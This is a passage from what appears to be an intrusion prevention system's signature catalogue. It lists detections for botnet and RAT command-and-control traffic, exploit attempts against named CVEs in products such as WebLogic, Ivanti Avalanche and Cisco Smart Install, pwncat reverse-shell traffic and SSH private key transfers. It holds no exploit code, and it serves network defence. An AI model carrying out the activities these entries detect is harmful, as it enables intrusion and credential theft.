Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: W32/Nuwar@mm-Malware
Description:
Back to top

Generic_SS-W32/Sdbot.worm.gen-Activity

About this situation: W32/Sdbot.worm.gen activity detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: W32/Sdbot.worm.gen-Malware
Description:
Back to top

Generic_SS-W32/Sdbot.worm.gen.bj-Activity

About this situation: W32/Sdbot.worm.gen.bj activity
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: W32/Sdbot.worm.gen.bj-Malware
Description:
Back to top

Generic_SS-W32/Sdbot.worm.gen.by-Activity

About this situation: W32/Sdbot.worm.gen.by activity
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: W32/Sdbot.worm.gen.by-Malware
Description:
Back to top

Generic_SS-Yahoo!-Messenger-File-Transfer-Filename-Spoofing

About this situation: An attempt to exploit a vulnerability in Yahoo! Messenger detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Yahoo Messenger, CVE2005, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-413-4219
Last changed: sgpkg-ips-413-4219
Vulnerability: Yahoo!-Messenger-File-Transfer-Filename-Spoofing
Description:
Back to top

Generic_SS-Yoddos-Activity

About this situation: Yoddos activity detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1125-5242
Vulnerability: Botnet-Yoddos
Description:
Back to top

Generic_SS-Z-Scada-Net2.0-0-Day

About this situation: Z-Scada Net2.0 Buffer Overflow Vulnerability
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Z-Scada Net 2.0, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-627-5211
Vulnerability: Z-Scada-Net2.0-0-Day
Description:
Back to top

Generic_Ssl-PCT-Buffer-Overflow

About this situation: Buffer overflow in Microsoft SSL Library
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, MS2004, CVE2003, Windows not specific, Exchange Server not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-510-5211
Vulnerability: Ssl-PCT-Buffer-Overflow
Description:
Back to top

Generic_Sun-Directory-Server-LDAP-DOS-2

About this situation: Detects denial of service exploits against the Sun Directory Server
Context: TCP Client Stream Unknown
Severity: 2
Tags: Solaris 9, Any Hardware, Sun Microsystems JavaSystem Directory Server, CVE2006, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-213-2032
Last changed: sgpkg-ips-218-3038
Vulnerability: LDAP-Sun-Directory-Server-LDAP-DOS
Description:
Back to top

Generic_Sun-Microsystems-Java-System-Web-Proxy-Sockd-Daemon-Buffer-Overflow

About this situation: An attempt to exploit buffer overflow vulnerability in Sun Microsystems Java System Web Proxy Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Sun Java Web Proxy Server, CVE2007, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-109-2032
Last changed: sgpkg-ips-194-2032
Vulnerability: Sun-Microsystems-Java-System-Web-Proxy-Sockd-Daemon-Buffer-Overflow
Description:
Back to top

Generic_SunRPC-CMSD-CREATE-Buffer-Overflow

About this situation: Buffer overflow in rpc.cmsd
Context: UDP Packet Unknown
Severity: 7
Tags: Unix, Any Hardware, rpc.cmsd, CVE1999, Unix not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-640-5211
Vulnerability: RPC-CMSD-CREATE-Buffer-Overflow-Vulnerability
Description:
Back to top

Generic_SunRPC-SnmpXdmid-Exploit-Detected

About this situation: Attempt to exploit snmpxdmid detected
Context: TCP Client Stream Unknown
Severity: 10
Tags: Solaris, Any Hardware, snmpXdmid, CVE2001, Solaris not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-370-4219
Last changed: sgpkg-ips-445-4219
Vulnerability: Solaris-SnmpXdmid-Malformed-DMI-Request-BOF
Description:
Back to top

Generic_Suspiciously-Long-URI-Component

About this situation: Oversized URI Path Component
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-340-4219
Last changed: sgpkg-ips-720-5211
Description:
Back to top

Generic_Symantec-Alert-Management-Arbitrary-Program-Execution

About this situation: Symantec Alert Management System Intel File Transfer Service Arbitrary Program Execution
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Symantec Antivirus Corporate Edition, Symantec Alert Management System, Symantec Endpoint Protection, CVE2009, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-220-3038
Last changed: sgpkg-ips-448-4219
Vulnerability: Symantec-Alert-Management-System-Arbitrary-Program-Execution
Description:
Back to top

Generic_Symantec-Alert-Management-System-Alert-Originator-Service-BOF

About this situation: Symantec Alert Management System IntelAlert Originator Service Buffer Overflow
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Symantec Alert Management System, CVE2009, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-220-3038
Last changed: sgpkg-ips-525-5211
Vulnerability: Symantec-Alert-Management-System-Intel-Alert-Originator-Service-Buffer-Overflow
Description:
Back to top

Generic_Symantec-Alert-Management-System-Arbitrary-Remote-Command-Execution

About this situation: Symantec Alert Management System Remote Command Execution Vulnerability
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Symantec Alert Management System 2, CVE2009, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-424-4219
Last changed: sgpkg-ips-1761-5242
Vulnerability: Symantec-AMS2-Arbitrary-Command-Execution
Description:
Back to top

Generic_Symantec-Alert-Management-System-Potential-Remote-Command-Execution

About this situation: Symantec Alert Management System Remote Command Execution Vulnerability
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Symantec Alert Management System 2, CVE2009, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-426-4219
Last changed: sgpkg-ips-1781-5242
Vulnerability: Symantec-AMS2-Arbitrary-Command-Execution
Description:
Back to top

Generic_Symantec-AntiVirus-Real-Time-Virus-Scan-Service-Stack-Overflow-Exploit

About this situation: Buffer overflow exploit against Symantec Real-Time Virus Scan Service detected
Context: TCP Client Stream Unknown
Severity: 10
Tags: Any Operating System, Any Hardware, Symantec Antivirus Corporate Edition, Symantec Client Security, CVE2006, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-110-2032
Last changed: sgpkg-ips-510-5211
Vulnerability: Symantec-AntiVirus-Real-Time-Virus-Scan-Service-Stack-Overflow
Description:
Back to top

Generic_Symantec-Discovery-XFERWAN-Service-Buffer-Overflow

About this situation: Buffer overflow exploit against the Symantec Discovery XFERWAN Service detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Symantec Discovery, CVE2007, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-110-2032
Last changed: sgpkg-ips-153-2032
Vulnerability: Symantec-Discovery-XFERWAN-Service-Buffer-Overflow
Description:
Back to top

Generic_Symantec-Veritas-NetBackup-Command-Chaining

About this situation: An attempt to exploit a vulnerability in Symantec VERITAS NetBackup detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Veritas Software NetBackup, CVE2006, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-94-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Symantec-Veritas-NetBackup-Command-Chaining
Description:
Back to top

Generic_Symantec-Veritas-NetBackup-Connect-Option-Request-Buffer-Overflow

About this situation: Detects buffer overflow exploits against Symantec VERITAS NetBackup
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Veritas Software NetBackup, CVE2006, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-89-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Symantec-Veritas-NetBackup-Connect_Options-Request-Buffer-Overflow
Description:
Back to top

Generic_TCP-Apache-Dubbo-Routing-Configuration-Unsafe-YAML-Unmarshalling

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Dubbo detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Dubbo, CVE2021, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1366-5242
Last changed: sgpkg-ips-1366-5242
Vulnerability: Apache-Dubbo-Routing-Configuration-Unsafe-YAML-Unmarshalling
Description:
Back to top

Generic_TCP-Apache-Dubbo-Script-Routing-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Dubbo detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Dubbo, CVE2021, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1359-5242
Last changed: sgpkg-ips-1359-5242
Vulnerability: Apache-Dubbo-Script-Routing-Remote-Code-Execution
Description:
Back to top

Generic_TCP-Apple-Products-Sslverifysignedserverkeyexchange-Security-Feature-Bypass

About this situation: An attempt to exploit a vulnerability in Apple Computer Apple TV detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Mac OS X, Any Hardware, CVE2014, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-973-5242
Last changed: sgpkg-ips-1244-5242
Vulnerability: Apple-Products-Sslverifysignedserverkeyexchange-Security-Feature-Bypass
Description:
Back to top

Generic_TCP-CA-Unified-Infrastructure-Management-Nimcontroller-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in CA Unified Infrastructure Management Nimcontroller detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Nimcontroller, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1280-5242
Last changed: sgpkg-ips-1280-5242
Vulnerability: CA-Unified-Infrastructure-Management-Nimcontroller-Buffer-Overflow
Description:
Back to top

Generic_TCP-Cesanta-Mongoose-Parse_MQTT-DOS

About this situation: An attempt to exploit a vulnerability in Cesanta Mongoose detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Cesanta Mongoose, CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1222-5242
Last changed: sgpkg-ips-1222-5242
Vulnerability: Cesanta-Mongoose-Parse_MQTT-DOS
Description:
Back to top

Generic_TCP-Cisco-IOS-And-IOS-XE-Software-Smart-Install-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Cisco IOS Smart Install (SMI) detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Cisco IOS, Any Hardware, Cisco SMI, CVE2018, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1088-5242
Last changed: sgpkg-ips-1088-5242
Vulnerability: Cisco-IOS-And-IOS-XE-Software-Smart-Install-Remote-Code-Execution
Description:
Back to top

Generic_TCP-Cisco-SMI-Exploit-CVE-2018-0171

About this situation: An exploit against Cisco Smart Install feature
Context: TCP Client Stream Unknown
Severity: 7
Tags: Cisco IOS, Any Hardware, Cisco SMI, CVE2018, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1088-5242
Last changed: sgpkg-ips-1555-5242
Vulnerability: Cisco-IOS-And-IOS-XE-Software-Smart-Install-Remote-Code-Execution
Description:
Back to top

Generic_TCP-CS-Digium-Asterisk-SIP-Sscanf-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Digium Asterisk detected
Context: TCP Client Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2009, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-1037-5242
Last changed: sgpkg-ips-1037-5242
Vulnerability: Digium-Asterisk-SIP-Sscanf-Denial-Of-Service
Description:
Back to top

Generic_TCP-Curl-SOCKS5-Heap-Buffer-Overflow-CVE-2023-38545

About this situation: An attempt to exploit a vulnerability in cURL detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, cURL, CVE2023, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1639-5242
Last changed: sgpkg-ips-1639-5242
Vulnerability: Curl-SOCKS5-Heap-Buffer-Overflow-CVE-2023-38545
Description:
Back to top

Generic_TCP-DarkVNC-C2-Traffic

About this situation: DarkVNC C2 traffic was detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1097-5242
Last changed: sgpkg-ips-1097-5242
Vulnerability: DarkVNC-C2-Traffic
Description:
Back to top

Generic_TCP-Digium-Asterisk-pjsip-In-Dialog-Message-Request-Denial-of-Service

About this situation: An attempt to exploit a vulnerability in Digium Asterisk Open Source detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1213-5242
Last changed: sgpkg-ips-1213-5242
Vulnerability: Digium-Asterisk-pjsip-In-Dialog-Message-Request-Denial-of-Service
Description:
Back to top

Generic_TCP-Fatal-RAT-Infection-Traffic

About this situation: Fatal RAT infection traffic was detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1380-5242
Last changed: sgpkg-ips-1380-5242
Vulnerability: Fatal-RAT-Infection-Traffic
Description:
Back to top

Generic_TCP-Ficker-Stealer-Infection-Traffic

About this situation: Ficker stealer infection traffic was detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1352-5242
Last changed: sgpkg-ips-1353-5242
Vulnerability: Ficker-Stealer-Infection-Traffic
Description:
Back to top

Generic_TCP-IBM-TM1-Planning-Analytics-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in IBM TM1 Planning Analytics detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IBM TM1, CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1406-5242
Last changed: sgpkg-ips-1406-5242
Vulnerability: IBM-TM1-Planning-Analytics-Remote-Code-Execution
Description:
Back to top

Generic_TCP-ISC-DHCP-Server-Omapi-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC DHCP Server detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, ISC DHCP Server, CVE2017, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1142-5242
Last changed: sgpkg-ips-1142-5242
Vulnerability: ISC-DHCP-Server-Omapi-Denial-Of-Service
Description:
Back to top

Generic_TCP-Ivanti-Avalanche-Certificate-Management-Server-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1504-5242
Last changed: sgpkg-ips-1504-5242
Vulnerability: Ivanti-Avalanche-Certificate-Management-Server-Insecure-Deserialization
Description:
Back to top

Generic_TCP-Ivanti-Avalanche-Jwttokenutility-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2022, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1508-5242
Last changed: sgpkg-ips-1622-5242
Vulnerability: Ivanti-Avalanche-Jwttokenutility-Insecure-Deserialization
Description:
Back to top

Generic_TCP-Ivanti-Avalanche-Smartdeviceserver-Devicelogsmanager-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2022, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1486-5242
Last changed: sgpkg-ips-1597-5242
Vulnerability: Ivanti-Avalanche-Smartdeviceserver-Devicelogsmanager-Directory-Traversal
Description:
Back to top

Generic_TCP-LuminosityLink-RAT-C2-Traffic

About this situation: LuminosityLink RAT C2 traffic was detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1093-5242
Last changed: sgpkg-ips-1093-5242
Vulnerability: LuminosityLink-RAT-C2-Traffic
Description:
Back to top

Generic_TCP-NightFury-Infection-Traffic

About this situation: NightFury infection traffic was detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1378-5242
Last changed: sgpkg-ips-1378-5242
Vulnerability: NightFury-Infection-Traffic
Description:
Back to top

Generic_TCP-OpenBSD-TCP-Timeout-Calculation-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in OpenBSD Project OpenBSD detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: OpenBSD, Any Hardware, CVE2005, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1245-5242
Last changed: sgpkg-ips-1245-5242
Vulnerability: OpenBSD-TCP-Timeout-Calculation-Denial-Of-Service
Description:
Back to top

Generic_TCP-Oracle-Business-Intelligence-Publisher-Xdo-Xml-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in Oracle Business Intelligence Enterprise Edition detected.
Context: TCP Server Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Business Intelligence Enterprise Edition, CVE2021, Any Operating System not specific, Suspected Disclosure, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1391-5242
Last changed: sgpkg-ips-1391-5242
Vulnerability: Oracle-Business-Intelligence-Publisher-Xdo-Xml-External-Entity-Injection
Description:
Back to top

Generic_TCP-Oracle-MySQL-Cluster-GSN_CREATE_NODEGROUP_IMPL_REQ-RCE

About this situation: An attempt to exploit a vulnerability in Oracle MySQL detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle MySQL Cluster, CVE2022, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1487-5242
Last changed: sgpkg-ips-1487-5242
Vulnerability: Oracle-MySQL-Cluster-GSN_CREATE_NODEGROUP_IMPL_REQ-RCE
Description:
Back to top

Generic_TCP-Oracle-WebLogic-CVE-2020-14625-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1274-5242
Last changed: sgpkg-ips-1274-5242
Vulnerability: Oracle-WebLogic-CVE-2020-14625-Insecure-Deserialization
Description:
Back to top

Generic_TCP-Oracle-WebLogic-CVE-2020-14644-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1274-5242
Last changed: sgpkg-ips-1388-5242
Vulnerability: Oracle-WebLogic-CVE-2020-14644-Insecure-Deserialization
Description:
Back to top

Generic_TCP-Oracle-WebLogic-CVE-2020-14825-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1297-5242
Last changed: sgpkg-ips-1297-5242
Vulnerability: Oracle-WebLogic-Server-CVE-2020-14825
Description:
Back to top

Generic_TCP-Oracle-WebLogic-CVE-2020-14841-IIOP-JNDI-Injection

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1298-5242
Last changed: sgpkg-ips-1782-5242
Vulnerability: Oracle-WebLogic-CVE-2020-14841-IIOP-JNDI-Injection
Description:
Back to top

Generic_TCP-pwncat-Traffic

About this situation: pwncat traffic was detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1252-5242
Last changed: sgpkg-ips-1252-5242
Vulnerability: pwncat-Traffic
Description:
Back to top

Generic_TCP-Quagga-BGP-Daemon-BGP_Capability_Msg_Parse-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Quagga detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Quagga, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1129-5242
Last changed: sgpkg-ips-1129-5242
Vulnerability: Quagga-BGP-Daemon-BGP_Capability_Msg_Parse-Denial-Of-Service
Description:
Back to top

Generic_TCP-Quagga-BGP-Daemon-Notify-Attribute-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Quagga Quagga detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Quagga, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1129-5242
Last changed: sgpkg-ips-1129-5242
Vulnerability: Quagga-BGP-Daemon-Notify-Attribute-Out-Of-Bounds-Read
Description:
Back to top

Generic_TCP-SIET-Change_Config-Command

About this situation: SIET traffic detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco SMI, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1061-5242
Last changed: sgpkg-ips-1087-5242
Vulnerability: Smart-Install-Exploitation-Tool
Cisco-IOS-And-IOS-XE-Software-Smart-Install-Remote-Code-Execution
Description:
Back to top

Generic_TCP-SIET-Get_Config-Command

About this situation: SIET traffic detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco SMI, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1061-5242
Last changed: sgpkg-ips-1087-5242
Vulnerability: Smart-Install-Exploitation-Tool
Cisco-IOS-And-IOS-XE-Software-Smart-Install-Remote-Code-Execution
Description:
Back to top

Generic_TCP-SIET-Update_ios-And-Execute-Command

About this situation: SIET traffic detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco SMI, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1061-5242
Last changed: sgpkg-ips-1087-5242
Vulnerability: Smart-Install-Exploitation-Tool
Cisco-IOS-And-IOS-XE-Software-Smart-Install-Remote-Code-Execution
Description:
Back to top

Generic_TCP-SSH-Private-Key-File-Transfer

About this situation: An SSH Private Key file transfer detected
Context: TCP Server Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1555-5242
Last changed: sgpkg-ips-1555-5242
Vulnerability: SSH-Private-Key-File-Transfer
Description:
Back to top

Generic_TCP-Tightvnc-Vncviewer-InitialiseRFBConnection-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in TightVNC detected.
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Linux, Any Hardware, TightVNC, CVE2022, Windows not specific, Linux not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1329-5242
Last changed: sgpkg-ips-1439-5242
Vulnerability: Tightvnc-Vncviewer-InitialiseRFBConnection-Heap-Buffer-Overflow
Description:
Back to top

Generic_TCP-VMware-Vcenter-Server-Integer-Underflow-CVE-2024-37079

About this situation: An attempt to exploit a vulnerability in VMWare vCenter Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, VMware Cloud Foundation, VMware vCenter Server, CVE2024, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1763-5242
Last changed: sgpkg-ips-1763-5242
Vulnerability: VMware-Vcenter-Server-Integer-Underflow-CVE-2024-37079
Description:
Back to top

Generic_TIP-Microsoft-Distributed-Transaction-Controller-Primary-Node-DoS

About this situation: Detects TIP requests
Context: TCP Client Stream Unknown
Severity: 2
Tags: Windows, x86, Microsoft Distributed Transaction Controller, MS2005-10, CVE2005, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-43-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: TIP-Microsoft-Distributed-Transaction-Controller-Primary-Node-DoS
Description:
Back to top

Generic_Trend-Micro-ServerProtect-EarthAgent-String-Buffer-Overflow

